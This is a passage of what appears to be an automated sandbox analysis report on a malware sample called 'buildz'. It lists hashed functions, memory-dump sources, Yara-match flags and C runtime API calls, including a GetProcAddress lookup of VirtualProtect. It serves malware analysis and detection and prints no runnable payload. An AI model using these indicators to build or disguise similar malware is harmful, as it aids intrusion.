                          • Instruction ID: 4e49599db087470943801f8e45f62a47aaca2c25427eb7fa136273f3d237f314
                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction Fuzzy Hash: 3E113D7724104243D657863ED8B46B7E3F5EBC632972C437AD1CA8B758D322E345D680
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                          • Instruction ID: 0f1daacff3a952a66c388a5dc145a946ce650407a081033521ba0667c3ebb4dd
                          • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                          • Instruction Fuzzy Hash: 9E114F0A8492C4BDCF464A7840E56EBFFA68E3B218F4A71DAC8C44B743D01B150FE7A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                          • Instruction ID: d9600ca457e98f7b7daaa68f8ce34677600e239d8c0c1bebab0d0cb7c6ff08b9
                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                          • Instruction Fuzzy Hash: 9C118E72340100AFEB58DF65DCD0FA673EAFB88320B1981A5ED08CB312D676E841CB60
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097760576.0000000000A2C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A2C000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a2c000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                          • Instruction ID: 6e26c73847c5d3f14b05f9690df6e4cf6ed5eca11d87d2cb1c6f37e812f6ce98
                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                          • Instruction Fuzzy Hash: B7118272340110AFD754DF59EC81FAA73EAEB89330B298165ED08CB316E676EC42C760
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                          • Instruction ID: 72107c8e7e1934f1482eca2e4ab1db822842b5569da1c5134880f7681afd8212
                          • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                          • Instruction Fuzzy Hash: DA0128768106629BD705DF3EC8C045AFBF1BB082217528B2ADC9083A41D334E662DBE4
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                          • String ID:
                          • API String ID: 1442030790-0
                          • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                          • Instruction ID: 172c8bc943ff68534b2b73c1a69edb907f107de6ba382d79690c76ec30188360
                          • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                          • Instruction Fuzzy Hash: 0121C036604600FEEB337F65DC02E4B7BEEDF41771B508029E589554A4EB628750CF58
                          APIs
                          • _memset.LIBCMT ref: 02333F51
                            • Part of subcall function 02335BA8: __getptd_noexit.LIBCMT ref: 02335BA8
                          • __gmtime64_s.LIBCMT ref: 02333FEA
                          • __gmtime64_s.LIBCMT ref: 02334020
                          • __gmtime64_s.LIBCMT ref: 0233403D
                          • __allrem.LIBCMT ref: 02334093
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023340AF
                          • __allrem.LIBCMT ref: 023340C6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023340E4
                          • __allrem.LIBCMT ref: 023340FB
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02334119
                          • __invoke_watson.LIBCMT ref: 0233418A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                          • Instruction ID: ee816ebf79beab13977ceea21178072d1bee1ea25000f8ca795a676bf6d84ac8
                          • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                          • Instruction Fuzzy Hash: 4471DA71B00B16ABD7299F79CC41B6AB3F9AF10764F144279E614E7680EB70EB408BD0
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                          • String ID:
                          • API String ID: 3432600739-0
                          • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                          • Instruction ID: e5e486ec1b629441cdb41ddd18744e31ff9bcc93e69d14b17bbd0beec632e568
                          • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                          • Instruction Fuzzy Hash: DD412372904304BFDB22AFA4DD82B9E7BFAAF48324F10402DFA0496190CB759744DF19
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ExitProcess___crt
                          • String ID:
                          • API String ID: 1022109855-0
                          • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                          • Instruction ID: 101903d3c43d2ed71891bdc9135165d9642781c189e87278751d8bd9b66fc443
                          • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                          • Instruction Fuzzy Hash: E3318433A00254DBEF235F54FC8484977A6FB14325704862AF949572B0CBF45BC9AF94
                          APIs
                          • std::exception::exception.LIBCMT ref: 0235FC1F
                            • Part of subcall function 0234169C: std::exception::_Copy_str.LIBCMT ref: 023416B5
                          • __CxxThrowException@8.LIBCMT ref: 0235FC34
                          • std::exception::exception.LIBCMT ref: 0235FC4D
                          • __CxxThrowException@8.LIBCMT ref: 0235FC62
                          • std::regex_error::regex_error.LIBCPMT ref: 0235FC74
                            • Part of subcall function 0235F914: std::exception::exception.LIBCMT ref: 0235F92E
                          • __CxxThrowException@8.LIBCMT ref: 0235FC82
                          • std::exception::exception.LIBCMT ref: 0235FC9B
                          • __CxxThrowException@8.LIBCMT ref: 0235FCB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                          • String ID: leM
                          • API String ID: 3569886845-2926266777
                          • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                          • Instruction ID: f9337cfde3ade37b34b049770b04270b2e7fb50faa943ac7cfbde6bd1e3db0b8
                          • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                          • Instruction Fuzzy Hash: 9C11EC79C0060DBBCF00FFA5D455CDDBBBDAA04344B4085A6AD5897640EB74E3888F94
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free_malloc_wprintf$_sprintf
                          • String ID:
                          • API String ID: 3721157643-0
                          • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                          • Instruction ID: 55322500b169ead389d2e9d59dcb3d6320b70aa76a7bc2fd4ae3fd4962b05556
                          • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                          • Instruction Fuzzy Hash: 421121B2A006642AD272A3F40C11EFF7AED9F46702F0800A9FE8DD1180EB585B049BB1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_memset$_malloc_sprintf
                          • String ID:
                          • API String ID: 65388428-0
                          • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                          • Instruction ID: 02c063fcb904e8d92f877cb156ab129af9b578cb0cf98879b409464b250dccf1
                          • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                          • Instruction Fuzzy Hash: AD518C71D40219ABDB21DBA1DD86FEFBBB9FF04704F100025F949B6190EB746A058BA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_memset_sprintf
                          • String ID:
                          • API String ID: 217217746-0
                          • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                          • Instruction ID: 566b06e429dae41069ed47a5f8ab304943c7c5f775ab3717c24e8c6fbdc26a32
                          • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                          • Instruction Fuzzy Hash: 7D514DB1E40209AADF15DFA1DC46FEEBBB9EB04704F104029F905B6190DB75AA058BA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_memset_sprintf
                          • String ID:
                          • API String ID: 217217746-0
                          • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                          • Instruction ID: 6c00346d093dc67c338fb24f9bf65b641234f847eaf6df5fe9b893d3450e911f
                          • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                          • Instruction Fuzzy Hash: 6F515E71E40209ABDF25DFA1DC46FEEBBB9FF04704F100129F905B6180EB74AA058BA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                          • String ID:
                          • API String ID: 3534693527-0
                          • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                          • Instruction ID: e6fbd86d798bda4fea9a1ce2db8678d7e6034dc582a7b91e3a69fb3b5cee23cd
                          • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                          • Instruction Fuzzy Hash: DA31D272A01235ABDB326B64DC00FAF7BA99F05B64F104415FE0CEB284DB788641CBA1
                          APIs
                          • __getptd_noexit.LIBCMT ref: 023D66DD
                            • Part of subcall function 023359BF: __calloc_crt.LIBCMT ref: 023359E2
                            • Part of subcall function 023359BF: __initptd.LIBCMT ref: 02335A04
                          • __calloc_crt.LIBCMT ref: 023D6700
                          • __get_sys_err_msg.LIBCMT ref: 023D671E
                          • __invoke_watson.LIBCMT ref: 023D673B
                          • __get_sys_err_msg.LIBCMT ref: 023D676D
                          • __invoke_watson.LIBCMT ref: 023D678B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                          • String ID:
                          • API String ID: 4066021419-0
                          • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                          • Instruction ID: 87f9fabdfd59e0a852245f9ed282d048907200e90afc49cbb7affc178fd56e38
                          • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                          • Instruction Fuzzy Hash: 2E11C1736016187BEB327B25BC42BAA739DEF047A0F000426FE28A6641E725DA004EE4
                          APIs
                          • __getptd.LIBCMT ref: 00406AA6
                            • Part of subcall function 00405A74: __getptd_noexit.LIBCMT ref: 00405A77
                            • Part of subcall function 00405A74: __amsg_exit.LIBCMT ref: 00405A84
                          • __amsg_exit.LIBCMT ref: 00406AC6
                          • __lock.LIBCMT ref: 00406AD6
                          • InterlockedDecrement.KERNEL32(?), ref: 00406AF3
                          • InterlockedIncrement.KERNEL32(00B62C70), ref: 00406B1E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                          • String ID:
                          • API String ID: 4271482742-0
                          • Opcode ID: 1eb2021f09b8162012e89e978dbd8aba961f61f17decea3a8d59bf397c206760
                          • Instruction ID: cdd84f080c1debe981746054c95a265262230b90676d84d4889a86b022b30cc6
                          • Opcode Fuzzy Hash: 1eb2021f09b8162012e89e978dbd8aba961f61f17decea3a8d59bf397c206760
                          • Instruction Fuzzy Hash: 6101CE71A0163197DB20BB26980574A7FA0BB02714F05413BE802B72E1C77CA911CF9D
                          APIs
                          • __lock.LIBCMT ref: 004010AA
                            • Part of subcall function 00402756: __mtinitlocknum.LIBCMT ref: 0040276C
                            • Part of subcall function 00402756: __amsg_exit.LIBCMT ref: 00402778
                            • Part of subcall function 00402756: EnterCriticalSection.KERNEL32(00402557,00402557,?,004034BD,00000004,0049F538,0000000C,004072F8,00401024,00402566,00000000,00000000,00000000,?,00405A26,00000001), ref: 00402780
                          • ___sbh_find_block.LIBCMT ref: 004010B5
                          • ___sbh_free_block.LIBCMT ref: 004010C4
                          • HeapFree.KERNEL32(00000000,00401024,0049F490,0000000C,00402737,00000000,0049F518,0000000C,00402771,00401024,00402557,?,004034BD,00000004,0049F538,0000000C), ref: 004010F4
                          • GetLastError.KERNEL32(?,004034BD,00000004,0049F538,0000000C,004072F8,00401024,00402566,00000000,00000000,00000000,?,00405A26,00000001,00000214), ref: 00401105
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 93c7f7d565bf40cb655ae4928169a075691bb88d871f841916ddc2842b5689eb
                          • Instruction ID: 59e4f6185c55ace5c89b71890e44da3ce3de3843e86e6b19bef1ec80ae2a3ef2
                          • Opcode Fuzzy Hash: 93c7f7d565bf40cb655ae4928169a075691bb88d871f841916ddc2842b5689eb
                          • Instruction Fuzzy Hash: 7A018431900211AADB347FB29D0A75F7BA49F00759F20417FF504BA5D1CBBC85808A6D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: D
                          • API String ID: 2102423945-2746444292
                          • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                          • Instruction ID: 19feb84e44476b5f61a47fa7d3824889a4aa495c2de3edc878f0dd9d9e06dfc6
                          • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                          • Instruction Fuzzy Hash: 77E14C71D00229AADF24DBA0DD49FEFB7B9BF04304F144069EA09E6590EB74AA49CF54
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: $$$(
                          • API String ID: 2102423945-3551151888
                          • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                          • Instruction ID: afa0e67791a1fedca9468a463c68d589410b93dd660e544feca9db4b577375d6
                          • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                          • Instruction Fuzzy Hash: A091CF71D0025CAAEF25CFA0CC49BEEBBB5AF06304F148069D506B72C1DBB65A48CF65
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcsnlen
                          • String ID: U
                          • API String ID: 3628947076-3372436214
                          • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                          • Instruction ID: b11f20445d866073b9a4157611bce2cf5397da0504c6af400ecb3be06139ce6b
                          • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                          • Instruction Fuzzy Hash: 5E21EB32614308BEEB119BA49C45BBE73ADDB49761F904165F908CA190FB71EB408AA4
                          APIs
                          • GetModuleHandleW.KERNEL32(0052C558), ref: 0049DAD9
                          • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 0049DB16
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: $VirtualProtect
                          • API String ID: 1646373207-947944765
                          • Opcode ID: 0473270676501902bccd6841ceec1f72723e772bf682f3a5b2d46519c83b76e7
                          • Instruction ID: 02030bbd71804f3ff2389fcc0c7a285aa7659bcb3e9989f0bd6bd967cdfee3c6
                          • Opcode Fuzzy Hash: 0473270676501902bccd6841ceec1f72723e772bf682f3a5b2d46519c83b76e7
                          • Instruction Fuzzy Hash: DD31522564C3C09DFB11CBA8BC057263F91AF23B45F10006AE9548B2B2E7FA5649D76E
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: p2Q
                          • API String ID: 2102423945-1521255505
                          • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                          • Instruction ID: 9b6f7632d74a293069f366eac188ad4c9410bd2d18dae30b5f184510db8fdf58
                          • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                          • Instruction Fuzzy Hash: 7AF0E578694790A5F7217B50BC267857D927B31B08F104045D1142E2E1D3FD234C6799
                          APIs
                          • std::exception::exception.LIBCMT ref: 0235FBF1
                            • Part of subcall function 0234169C: std::exception::_Copy_str.LIBCMT ref: 023416B5
                          • __CxxThrowException@8.LIBCMT ref: 0235FC06
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                          • String ID: TeM$TeM
                          • API String ID: 3662862379-3870166017
                          • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                          • Instruction ID: 67aecc605eca34ad52cd1d062127c40f79b2256436c0aae87e6e6f32faf87050
                          • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                          • Instruction Fuzzy Hash: D0D067B5C0020CBBCB00EFA5D459CDDBBB9AA04344B0084A6AD5897241EA74E3898F94
                          APIs
                            • Part of subcall function 0233197D: __wfsopen.LIBCMT ref: 02331988
                          • _fgetws.LIBCMT ref: 0231D15C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __wfsopen_fgetws
                          • String ID:
                          • API String ID: 853134316-0
                          • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                          • Instruction ID: 725bc4b622138aa7ce886cb3311c019710de2b5470127a1edffc5c58006230eb
                          • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                          • Instruction Fuzzy Hash: 4B91D372D1031D9BCF29DFA4CC847AEB7B5BF06304F140529E815A3240E776EA15CBA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _malloc$__except_handler4_fprintf
                          • String ID:
                          • API String ID: 1783060780-0
                          • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                          • Instruction ID: 78df6c9611fbb97c6418814d5908038b4a108b63b07c21da4ba6e66d942de26d
                          • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                          • Instruction Fuzzy Hash: D6A14EB1C0025CEBEF25EFE4C849BEEBB76AF15308F144028D50576291D7B65A48CFA6
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                          • String ID:
                          • API String ID: 2974526305-0
                          • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                          • Instruction ID: ba72665ec8df62a519e9465af8eb769b6112f735f22892decb88b3ad73f15b89
                          • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                          • Instruction Fuzzy Hash: 9D518E70A0030A9BDB2A8F798C846AFB7B6AF40724F248729FC75966D0D7759F51CB40
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00408779
                          • __isleadbyte_l.LIBCMT ref: 004087AD
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 004087DE
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040884C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: e3bd377d34101a6f5117f085b6af3acb2cd46a9db19d47d0fcb7c7cc7b016cbc
                          • Instruction ID: 334f6a4a126d5940180373832c32ee90fdd292d3e68c9bbf7b1a7f8614c75bf2
                          • Opcode Fuzzy Hash: e3bd377d34101a6f5117f085b6af3acb2cd46a9db19d47d0fcb7c7cc7b016cbc
                          • Instruction Fuzzy Hash: 4731C031A00245EFDB20EF64CE849AA3BA5BF01310F24857EE4E1AB2D5EB34DD51DB59
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
